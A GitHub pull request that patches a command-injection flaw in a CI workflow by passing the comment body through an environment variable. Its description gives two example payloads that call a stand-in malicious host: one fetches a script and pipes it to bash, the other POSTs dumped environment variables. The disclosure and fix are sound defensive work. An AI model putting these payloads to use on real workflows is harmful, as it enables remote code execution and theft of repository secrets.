### PR TITLE
Security Update perf.yml

### DIFF
--- a/.github/workflows/perf.yml
+++ b/.github/workflows/perf.yml
@@ -132,9 +132,11 @@ jobs:
 
     - name: Choose perf suites
       id: choose_perf
+      env: 
+           COMMENT_BODY: ${{ github.event.comment.body }}
       run: |
-        suites=$(echo "${{ github.event.comment.body }}" | awk '{print $1}')
-        tags=$(echo "${{ github.event.comment.body }}" | awk '{print $2}')
+        suites=$(echo "$COMMENT_BODY" | awk '{print $1}')
+        tags=$(echo "$COMMENT_BODY" | awk '{print $2}')
 
         if [[ $suite == "/flamegraph" ]]; then
           suites="02-flamegraph"


### PR DESCRIPTION
perf.yml is vulnerable to RCE via command injection in comment body.

Currently, the following block simply appends the comment body to the shell command. Since the comment body is under user's control, a malicious entity could create a comment such that it escapes the command meant to be executed and instead execute arbitrary commands, which could lead to a variety of security issues such as deletion of files and issues, exfiltration of environment variables to leak secrets, supply chain attack etc: 

This script parses command inputs directly from the comment body of the GitHub event without sufficient input sanitization, allowing an attacker to inject malicious commands. The workflow is triggered under specific conditions:
1. On creation of a pull request
2. On creation of an issue comment
3. When the event is a pull request and the title starts with 'perf('
4. When the event is an issue comment, the action is 'created', the comment belongs to a pull request, the author of the comment is an owner, collaborator, or member, and the comment body starts with '/perf' or '/flamegraph'

An attacker could comment on a pull request or issue with a specially crafted message containing malicious shell commands, especially when the comment starts with '/perf' or '/flamegraph'. Here are two potential payloads that an attacker might use:
	
For Remote Code Execution (RCE): 			
/perf `curl https://malicious-site.com/malicious-script.sh | bash`			
 		
For stealing environment variables: 			
/perf `env > /tmp/env.txt && curl -X POST -d @/tmp/env.txt https://malicious-site.com/`
	
When the workflow runs, the script would interpret these injected commands, leading to Remote Code Execution (RCE). Since GitHub actions have access to secrets stored in environment variables, these commands could potentially access and exfiltrate these secrets, compromising the security of the repository or organization.

### Checklist

- [x] The Pull Request has tests
- [ ] There's an entry in the CHANGELOG
- [ ] There is a user-facing docs PR against https://github.com/Kong/docs.konghq.com - PUT DOCS PR HERE
